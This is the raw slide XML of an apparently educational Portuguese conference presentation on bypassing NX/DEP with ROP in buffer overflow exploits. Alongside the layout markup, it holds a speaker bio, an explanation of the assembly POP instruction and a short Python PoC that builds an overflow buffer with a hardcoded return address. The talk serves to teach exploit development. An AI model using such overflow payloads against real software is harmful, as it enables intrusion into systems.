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67"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="257" r:id="rId3"/>
    <p:sldId id="258" r:id="rId4"/>
    <p:sldId id="521" r:id="rId5"/>
    <p:sldId id="522" r:id="rId6"/>
    <p:sldId id="483" r:id="rId7"/>
    <p:sldId id="471" r:id="rId8"/>
    <p:sldId id="475" r:id="rId9"/>
    <p:sldId id="476" r:id="rId10"/>
    <p:sldId id="477" r:id="rId11"/>
    <p:sldId id="479" r:id="rId12"/>
    <p:sldId id="480" r:id="rId13"/>
    <p:sldId id="481" r:id="rId14"/>
    <p:sldId id="482" r:id="rId15"/>
    <p:sldId id="523" r:id="rId16"/>
    <p:sldId id="524" r:id="rId17"/>
    <p:sldId id="332" r:id="rId18"/>
    <p:sldId id="313" r:id="rId19"/>
    <p:sldId id="314" r:id="rId20"/>
    <p:sldId id="315" r:id="rId21"/>
    <p:sldId id="348" r:id="rId22"/>
    <p:sldId id="298" r:id="rId23"/>
    <p:sldId id="371" r:id="rId24"/>
    <p:sldId id="474" r:id="rId25"/>
    <p:sldId id="473" r:id="rId26"/>
    <p:sldId id="485" r:id="rId27"/>
    <p:sldId id="484" r:id="rId28"/>
    <p:sldId id="486" r:id="rId29"/>
    <p:sldId id="487" r:id="rId30"/>
    <p:sldId id="518" r:id="rId31"/>
    <p:sldId id="519" r:id="rId32"/>
    <p:sldId id="520" r:id="rId33"/>
    <p:sldId id="496" r:id="rId34"/>
    <p:sldId id="497" r:id="rId35"/>
    <p:sldId id="498" r:id="rId36"/>
    <p:sldId id="499" r:id="rId37"/>
    <p:sldId id="500" r:id="rId38"/>
    <p:sldId id="501" r:id="rId39"/>
    <p:sldId id="502" r:id="rId40"/>
    <p:sldId id="515" r:id="rId41"/>
    <p:sldId id="494" r:id="rId42"/>
    <p:sldId id="495" r:id="rId43"/>
    <p:sldId id="488" r:id="rId44"/>
    <p:sldId id="489" r:id="rId45"/>
    <p:sldId id="490" r:id="rId46"/>
    <p:sldId id="491" r:id="rId47"/>
    <p:sldId id="493" r:id="rId48"/>
    <p:sldId id="492" r:id="rId49"/>
    <p:sldId id="503" r:id="rId50"/>
    <p:sldId id="504" r:id="rId51"/>
    <p:sldId id="505" r:id="rId52"/>
    <p:sldId id="506" r:id="rId53"/>
    <p:sldId id="507" r:id="rId54"/>
    <p:sldId id="508" r:id="rId55"/>
    <p:sldId id="509" r:id="rId56"/>
    <p:sldId id="510" r:id="rId57"/>
    <p:sldId id="512" r:id="rId58"/>
    <p:sldId id="513" r:id="rId59"/>
    <p:sldId id="514" r:id="rId60"/>
    <p:sldId id="516" r:id="rId61"/>
    <p:sldId id="517" r:id="rId62"/>
    <p:sldId id="447" r:id="rId63"/>
    <p:sldId id="525" r:id="rId64"/>
    <p:sldId id="526" r:id="rId65"/>
    <p:sldId id="268" r:id="rId6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Rubik" pitchFamily="2" charset="-79"/>
      <p:regular r:id="rId72"/>
      <p:bold r:id="rId73"/>
      <p:italic r:id="rId74"/>
      <p:boldItalic r:id="rId75"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Rubik Light" pitchFamily="2" charset="-79"/>
      <p:regular r:id="rId76"/>
      <p:bold r:id="rId77"/>
      <p:italic r:id="rId78"/>
      <p:boldItalic r:id="rId79"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Rubik Medium" pitchFamily="2" charset="-79"/>
      <p:regular r:id="rId80"/>
      <p:bold r:id="rId81"/>
      <p:italic r:id="rId82"/>
      <p:boldItalic r:id="rId83"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Trebuchet MS" panose="020B0703020202090204" pitchFamily="34" charset="0"/>
      <p:regular r:id="rId84"/>
      <p:bold r:id="rId85"/>
      <p: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3"/>
    <p:restoredTop sz="94682"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="142" d="100"/>
          <a:sy n="142" d="100"/>
        </p:scale>
        <p:origin x="58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84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font17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15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0DDB5-C626-204B-A84B-199317ACB2C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614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0DDB5-C626-204B-A84B-199317ACB2C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3006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0DDB5-C626-204B-A84B-199317ACB2C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1040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0DDB5-C626-204B-A84B-199317ACB2C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519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0DDB5-C626-204B-A84B-199317ACB2C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0513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0DDB5-C626-204B-A84B-199317ACB2C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482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0DDB5-C626-204B-A84B-199317ACB2C7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9688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0DDB5-C626-204B-A84B-199317ACB2C7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051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0DDB5-C626-204B-A84B-199317ACB2C7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015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0DDB5-C626-204B-A84B-199317ACB2C7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9996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d1a8ae3f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d1a8ae3f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0DDB5-C626-204B-A84B-199317ACB2C7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16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0DDB5-C626-204B-A84B-199317ACB2C7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5494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0DDB5-C626-204B-A84B-199317ACB2C7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0453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0DDB5-C626-204B-A84B-199317ACB2C7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5788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0DDB5-C626-204B-A84B-199317ACB2C7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5497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0DDB5-C626-204B-A84B-199317ACB2C7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4276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0DDB5-C626-204B-A84B-199317ACB2C7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12197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0DDB5-C626-204B-A84B-199317ACB2C7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77613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0DDB5-C626-204B-A84B-199317ACB2C7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54534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0DDB5-C626-204B-A84B-199317ACB2C7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1078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d1a8ae3f8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d1a8ae3f8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0DDB5-C626-204B-A84B-199317ACB2C7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40782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0DDB5-C626-204B-A84B-199317ACB2C7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3783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0DDB5-C626-204B-A84B-199317ACB2C7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2621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0DDB5-C626-204B-A84B-199317ACB2C7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331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0DDB5-C626-204B-A84B-199317ACB2C7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87313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0DDB5-C626-204B-A84B-199317ACB2C7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07603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0DDB5-C626-204B-A84B-199317ACB2C7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07509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0DDB5-C626-204B-A84B-199317ACB2C7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50876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5f54777d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5f54777d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d1a8ae3f8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d1a8ae3f8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3446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d1a8ae3f8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d1a8ae3f8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51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340974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098102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542588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02183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825" y="1953600"/>
            <a:ext cx="4146880" cy="121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4839625" y="-13000"/>
            <a:ext cx="4326600" cy="522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61700" y="179854"/>
            <a:ext cx="8820600" cy="4783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6950" y="1299101"/>
            <a:ext cx="6540500" cy="326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F4D43"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="4F4D43"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="4F4D43"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="4F4D43"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="4F4D43"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/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mestres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36550" y="273844"/>
            <a:ext cx="6953250" cy="99417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235782"/>
                </a:solidFill>
              </a:defRPr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um </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>título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D2EB1-7679-5045-A325-CC36B6BA9C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6550" y="1305521"/>
            <a:ext cx="16954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65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635625"/>
            <a:ext cx="9154800" cy="450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432650" y="2150850"/>
            <a:ext cx="6278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ubik Medium"/>
              <a:buChar char="●"/>
              <a:defRPr sz="36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7874" y="111050"/>
            <a:ext cx="1356720" cy="39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0" y="635625"/>
            <a:ext cx="9154800" cy="450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7874" y="111050"/>
            <a:ext cx="1356720" cy="397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4"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="1222100" y="1174050"/>
            <a:ext cx="14700" cy="3552900"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="3A1A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8;p3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD1CB159-6C4D-2B46-B7B9-AD4300331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406" y="0"/>
            <a:ext cx="7508468" cy="63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Rubik Medium"/>
              <a:buNone/>
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="bg1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09024B-A561-AB41-8E57-AF6C3DAF54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10341" y="1174050"/>
            <a:ext cx="7419031" cy="355290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lang="en-US" sz="2000" b="1" i="0" u="none" strike="noStrike" cap="none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Arial"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr algn="just">
              <a:defRPr lang="en-US" sz="2000" b="1" i="0" u="none" strike="noStrike" cap="none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Arial"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr algn="just">
              <a:defRPr lang="en-US" sz="2000" b="1" i="0" u="none" strike="noStrike" cap="none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Arial"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr algn="just">
              <a:defRPr lang="en-US" sz="2000" b="1" i="0" u="none" strike="noStrike" cap="none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Arial"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr algn="just">
              <a:defRPr lang="en-US" sz="2000" b="1" i="0" u="none" strike="noStrike" cap="none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Arial"/>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/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mestres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784B14-99EF-6347-91BA-8C65902553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6014" y="684834"/>
            <a:ext cx="743477" cy="2226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0" y="635625"/>
            <a:ext cx="9154800" cy="450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Google Shape;23;p4"/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7874" y="111050"/>
            <a:ext cx="1356720" cy="397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4"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="1990220" y="1113075"/>
            <a:ext cx="14700" cy="3552900"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="3A1A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8;p3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD1CB159-6C4D-2B46-B7B9-AD4300331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406" y="0"/>
            <a:ext cx="7508468" cy="63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Rubik Medium"/>
              <a:buNone/>
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="bg1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09024B-A561-AB41-8E57-AF6C3DAF54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60286" y="1174050"/>
            <a:ext cx="6669086" cy="355290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lang="en-US" sz="2000" b="1" i="0" u="none" strike="noStrike" cap="none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Arial"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr algn="just">
              <a:defRPr lang="en-US" sz="2000" b="1" i="0" u="none" strike="noStrike" cap="none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Arial"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr algn="just">
              <a:defRPr lang="en-US" sz="2000" b="1" i="0" u="none" strike="noStrike" cap="none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Arial"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr algn="just">
              <a:defRPr lang="en-US" sz="2000" b="1" i="0" u="none" strike="noStrike" cap="none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Arial"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr algn="just">
              <a:defRPr lang="en-US" sz="2000" b="1" i="0" u="none" strike="noStrike" cap="none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Arial"/>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/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mestres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505DD-1A05-4E49-BFDB-DB37B54416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9406" y="1145213"/>
            <a:ext cx="1695450" cy="3390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5B330B-D518-9E4C-B714-E2512C1FA6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6014" y="684834"/>
            <a:ext cx="743477" cy="22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14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635625"/>
            <a:ext cx="9154800" cy="450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p6"/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7874" y="111050"/>
            <a:ext cx="1356720" cy="3971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8;p3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F7F3B76-D74F-1745-89B7-E6561B511D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406" y="0"/>
            <a:ext cx="7508468" cy="63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Font typeface="Rubik Medium"/>
              <a:buNone/>
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="bg1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4A7945-7BE2-334E-AF50-39F6A851BC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6014" y="684834"/>
            <a:ext cx="743477" cy="2226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635625"/>
            <a:ext cx="9154800" cy="450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p6"/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7874" y="111050"/>
            <a:ext cx="1356720" cy="39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7D37E5-1002-CF4D-B4CE-24C1D0E608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6014" y="684834"/>
            <a:ext cx="743477" cy="22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22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2" name="Google Shape;42;p8"/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7874" y="111050"/>
            <a:ext cx="1356720" cy="397174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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="635625"/>
            <a:ext cx="9154800" cy="45078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0750D4-5F18-824D-9E1D-1E74B0081D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6014" y="684834"/>
            <a:ext cx="743477" cy="2226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6" name="Google Shape;46;p9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="574650" y="710550"/>
            <a:ext cx="7994700" cy="40272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702000" y="841500"/>
            <a:ext cx="7740000" cy="3765300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="3A1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" name="Google Shape;48;p9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7874" y="111050"/>
            <a:ext cx="1356720" cy="39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6550" y="1369219"/>
            <a:ext cx="7886700" cy="326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F4D43"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="4F4D43"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="4F4D43"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="4F4D43"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="4F4D43"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/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mestres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36550" y="273844"/>
            <a:ext cx="6953250" cy="99417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235782"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Clique para </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>adicionar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> um </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/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432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4012"/>
            <a:ext cx="9144000" cy="513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12"/>
            <a:ext cx="9144000" cy="513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4012"/>
            <a:ext cx="9144000" cy="51354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0" name="Google Shape;10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64" r:id="rId4"/>
    <p:sldLayoutId id="2147483652" r:id="rId5"/>
    <p:sldLayoutId id="2147483662" r:id="rId6"/>
    <p:sldLayoutId id="2147483654" r:id="rId7"/>
    <p:sldLayoutId id="2147483655" r:id="rId8"/>
    <p:sldLayoutId id="2147483661" r:id="rId9"/>
    <p:sldLayoutId id="214748366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lviojunior/Presentations/tree/master/2020/MindTheSe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www.sec4us.com.br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hyperlink" Target="https://github.com/helviojunior" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image13.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.helviojunior.com.br/" TargetMode="External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5301925" y="595100"/>
            <a:ext cx="25878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solidFill>
                  <a:srgbClr val="3A1A99"/>
                </a:solidFill>
                <a:latin typeface="Rubik Medium"/>
                <a:ea typeface="Rubik Medium"/>
                <a:cs typeface="Rubik Medium"/>
                <a:sym typeface="Rubik Medium"/>
              </a:rPr>
              <a:t>ROP</a:t>
            </a:r>
            <a:endParaRPr sz="3500" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3A1A9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5395799" y="1312099"/>
            <a:ext cx="3631659" cy="144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pt-BR" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3A1A99"/>
                </a:solidFill>
                <a:latin typeface="Rubik"/>
                <a:ea typeface="Rubik"/>
                <a:cs typeface="Rubik"/>
                <a:sym typeface="Rubik"/>
              </a:rPr>
              <a:t>Bypass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3A1A99"/>
                </a:solidFill>
                <a:latin typeface="Rubik"/>
                <a:ea typeface="Rubik"/>
                <a:cs typeface="Rubik"/>
                <a:sym typeface="Rubik"/>
              </a:rPr>
              <a:t> de proteção de execução (NX/DEP) durante um exploit de Buffer Overflow com ROP</a:t>
            </a:r>
            <a:endParaRPr sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3A1A9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AFD2E8-DB0B-0C4A-8954-A6272DCCBEB5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4811848" y="48972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BR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/helviojunior/Presentations/tree/master/2020/MindTheSec</a:t>
            </a:r>
            <a:endParaRPr lang="en-BR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3ACCAD-26F4-2348-93A3-9FCCED5A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Explorando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CE7A2-3AD3-FA49-A490-3F7718A240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55573"/>
            <a:ext cx="9144000" cy="4313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138DEB-749B-8148-BD42-B03A88BE8C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369" y="4472409"/>
            <a:ext cx="4682421" cy="507627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  <a:outerShdw blurRad="50800" dist="50800" dir="5400000" sx="1000" sy="1000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000"/>
            </a:outerShdw>
            <a:softEdge rad="0"/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A2A584-30CD-2C4C-9EAE-F4363DD7C024}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2821259" y="4259766"/>
            <a:ext cx="1405053" cy="21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91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3ACCAD-26F4-2348-93A3-9FCCED5A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Explorando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5F8610-A726-0543-A843-4B98E1EDAE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665" y="647281"/>
            <a:ext cx="7998670" cy="1011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6A6A40-831C-4648-9A56-8B61245ECE8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665" y="1698279"/>
            <a:ext cx="7998670" cy="332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8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3ACCAD-26F4-2348-93A3-9FCCED5A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Explorando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C2B79-711E-C64C-B15C-B7E1259347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98354"/>
            <a:ext cx="9144000" cy="174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16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3ACCAD-26F4-2348-93A3-9FCCED5A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Explorando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19FA43-30E6-344C-989E-D05B3E7A31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1787"/>
            <a:ext cx="9144000" cy="113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19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3ACCAD-26F4-2348-93A3-9FCCED5A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Explorando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3E397-7BA7-C044-ADD9-BAB36AFD7F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09" y="635625"/>
            <a:ext cx="8726182" cy="450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29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F74A62-0115-5B46-99AD-C0F3B913F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Arquivo PoC.py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1BB672-0ABE-4543-9983-BAF813C09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#!/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/bin/python2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# -*- coding: utf-8 -*-</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US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import sys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from struct import *</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US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buffer  = "MTS2020 "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buffer += "A" * 152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buffer += pack('&lt;L', 0x72740359)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buffer += "C" * 500</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US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print buffer</a:t>
            </a:r>
            <a:endParaRPr lang="en-BR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404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F74A62-0115-5B46-99AD-C0F3B913F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Hora da maldade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1BB672-0ABE-4543-9983-BAF813C09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BR" dirty="0"/>
              <a:t>Vamos começar?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3409893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Assembly - POP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b="0" dirty="0"/>
              <a:t>POP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t>Remove um conteúdo armazenado na pilha o colocando em um registrador</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="pt-BR" b="0" dirty="0"/>
              <a:t>Exemplo: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t>POP EAX, remove o conteúdo da pilha e o armazena no registrador EAX.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t>Supondo que antes da execução do POP o endereçamento do topo da pilha seja 0x0000000A (decimal 10) após o POP o topo da pilha é incrementado no mesmo tamanho do dado que foi removido. Neste nosso caso removemos 4 bytes, então o novo top da pilha passará a ser 0x0000000E (decimal 14), ou seja, 4 bytes a mais.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p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342900"/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9049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7324E-C262-2040-98DA-213440917C4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7968"/>
            <a:ext cx="9144000" cy="41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72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1F9FF-5A13-D746-8ECD-9D94B2B398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7968"/>
            <a:ext cx="9144000" cy="41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49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169010" y="593460"/>
            <a:ext cx="2587800" cy="8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700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3A1A99"/>
                </a:solidFill>
                <a:latin typeface="Rubik Medium"/>
                <a:ea typeface="Rubik Medium"/>
                <a:cs typeface="Rubik Medium"/>
                <a:sym typeface="Rubik Medium"/>
              </a:rPr>
              <a:t>WHOAMI</a:t>
            </a:r>
            <a:endParaRPr sz="3700" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3A1A9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218578" y="1188777"/>
            <a:ext cx="8396503" cy="80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Rubik Light"/>
              </a:rPr>
              <a:t>Hélvio Junior</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1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Rubik Light"/>
              </a:rPr>
              <a:t>Vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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lang="pt-BR" dirty="0" err="1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Rubik Light"/>
              </a:rPr>
              <a:t>Researcher</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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Rubik Light"/>
              </a:rPr>
              <a:t> | OSCE | OSCP | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1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Rubik Light"/>
              </a:rPr>
              <a:t>eCXD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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Rubik Light"/>
              </a:rPr>
              <a:t> | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1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Rubik Light"/>
              </a:rPr>
              <a:t>eMAPT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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Rubik Light"/>
              </a:rPr>
              <a:t> | CEH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2626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7" name="Google Shape;77;p15"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="306148" y="1267504"/>
            <a:ext cx="3704700" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="3A1A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Espaço Reservado para Conteúdo 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ECEF85F3-3874-C84A-AF93-FD335274114A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="218578" y="2075877"/>
            <a:ext cx="7886700" cy="306762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rgbClr val="626262"/>
              </a:buClr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626262"/>
                </a:solidFill>
                <a:latin typeface="Rubik Light"/>
                <a:cs typeface="Rubik Light"/>
              </a:rPr>
              <a:t>CEO – Sec4US Treinamentos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buClr>
                <a:srgbClr val="626262"/>
              </a:buClr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626262"/>
                </a:solidFill>
                <a:latin typeface="Rubik Light"/>
                <a:cs typeface="Rubik Light"/>
              </a:rPr>
              <a:t>E-mail: helvio.junior@sec4us.com.br</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buClr>
                <a:srgbClr val="626262"/>
              </a:buClr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626262"/>
                </a:solidFill>
                <a:latin typeface="Rubik Light"/>
                <a:cs typeface="Rubik Light"/>
              </a:rPr>
              <a:t>Instagram: @helvio_m4v3r1ck</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buClr>
                <a:srgbClr val="626262"/>
              </a:buClr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626262"/>
                </a:solidFill>
                <a:latin typeface="Rubik Light"/>
                <a:cs typeface="Rubik Light"/>
              </a:rPr>
              <a:t>Mais de 20 anos de atuação com TI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buClr>
                <a:srgbClr val="626262"/>
              </a:buClr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626262"/>
                </a:solidFill>
                <a:latin typeface="Rubik Light"/>
                <a:cs typeface="Rubik Light"/>
              </a:rPr>
              <a:t>Foco de estudo e pesquisa: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="1" indent="-342900">
              <a:buClr>
                <a:srgbClr val="626262"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="626262"/>
                </a:solidFill>
                <a:latin typeface="Rubik Light"/>
                <a:cs typeface="Rubik Light"/>
              </a:rPr>
              <a:t>Segurança ofensiva (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="626262"/>
                </a:solidFill>
                <a:latin typeface="Rubik Light"/>
                <a:cs typeface="Rubik Light"/>
              </a:rPr>
              <a:t>Red</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="626262"/>
                </a:solidFill>
                <a:latin typeface="Rubik Light"/>
                <a:cs typeface="Rubik Light"/>
              </a:rPr>
              <a:t> Team)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="1" indent="-342900">
              <a:buClr>
                <a:srgbClr val="626262"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="626262"/>
                </a:solidFill>
                <a:latin typeface="Rubik Light"/>
                <a:cs typeface="Rubik Light"/>
              </a:rPr>
              <a:t>Criação de exploits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="1" indent="-342900">
              <a:buClr>
                <a:srgbClr val="626262"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="626262"/>
                </a:solidFill>
                <a:latin typeface="Rubik Light"/>
                <a:cs typeface="Rubik Light"/>
              </a:rPr>
              <a:t>Pesquisa de Vulnerabilidades</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buClr>
                <a:srgbClr val="626262"/>
              </a:buClr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626262"/>
                </a:solidFill>
                <a:latin typeface="Rubik Light"/>
                <a:cs typeface="Rubik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https://www.sec4us.com.br/</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="626262"/>
              </a:solidFill>
              <a:latin typeface="Rubik Light"/>
              <a:cs typeface="Rubik Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buClr>
                <a:srgbClr val="626262"/>
              </a:buClr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626262"/>
                </a:solidFill>
                <a:latin typeface="Rubik Light"/>
                <a:cs typeface="Rubik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https://www.helviojunior.com.br/</a:t>
            </a:r>
